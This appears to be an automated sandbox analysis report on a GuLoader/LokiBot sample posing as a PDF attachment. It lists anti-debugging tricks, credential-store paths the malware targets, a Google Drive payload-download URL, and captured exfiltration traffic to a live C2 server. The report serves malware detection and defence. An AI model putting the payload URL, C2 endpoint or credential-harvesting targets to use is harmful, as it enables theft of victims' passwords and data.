Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

System information queried: ModuleInformation

Jump to behavior

Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW'
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Thread information set: HideFromDebugger			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Code function: 0_2_020ACEC8 rdtsc

0_2_020ACEC8

Enables debug privileges

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADAD0 mov eax, dword ptr fs:[00000030h]	0_2_020ADAD0
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AC6DF mov eax, dword ptr fs:[00000030h]	0_2_020AC6DF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ABA35 mov eax, dword ptr fs:[00000030h]	0_2_020ABA35
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADB37 mov eax, dword ptr fs:[00000030h]	0_2_020ADB37
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8EE2 mov eax, dword ptr fs:[00000030h]	0_2_020A8EE2

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Code function: 0_2_020AA1B2 LdrInitializeThunk,

0_2_020AA1B2

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
63.250.34.171	unknown	United States	22612	NAMECHEAP-NETUS	true
216.58.208.129	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
216.58.209.46	drive.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
drive.google.com	216.58.209.46	true
googlehosted.l.googleusercontent.com	216.58.208.129	true
doc-0g-14-docs.googleusercontent.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://63.250.34.171/tickets.php?id=156	true	Avira URL Cloud: safe	unknown
https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download	false		high

AV Detection:

Found malware configuration

Source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id="}

Multi AV Scanner detection for submitted file

Source: Anexo I e II do convite#U00b7pdf.exe

Virustotal: Detection: 29%

Perma Link

Machine Learning detection for sample

Source: Anexo I e II do convite#U00b7pdf.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.1.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.3.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.2.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 0.2.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen

Compliance:

Uses 32bit PE files

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 216.58.209.46:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.129:443 -> 192.168.2.3:49747 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 63.250.34.171:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 63.250.34.171 63.250.34.171

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-14-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 163Connection: close

Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:02 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:05 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:09 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171

Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-14-docs.googleusercontent.com/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/i
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQhb_RBrBtzpisGKe78
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-14-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 216.58.209.46:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.129:443 -> 192.168.2.3:49747 version: TLS 1.2

System Summary:

Potential malicious icon found

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Uses 32bit PE files

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Detected potential crypto function

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A269B	0_2_020A269B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A942C	0_2_020A942C
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADAD0	0_2_020ADAD0
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEEF5	0_2_020AEEF5
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A820F	0_2_020A820F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD26B	0_2_020AD26B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A826F	0_2_020A826F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7263	0_2_020A7263
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A72A3	0_2_020A72A3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD2E3	0_2_020AD2E3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A82FB	0_2_020A82FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD343	0_2_020AD343
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A835F	0_2_020A835F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A4364	0_2_020A4364
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A83CB	0_2_020A83CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD3F7	0_2_020AD3F7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD02E	0_2_020AD02E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE033	0_2_020AE033
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD05B	0_2_020AD05B
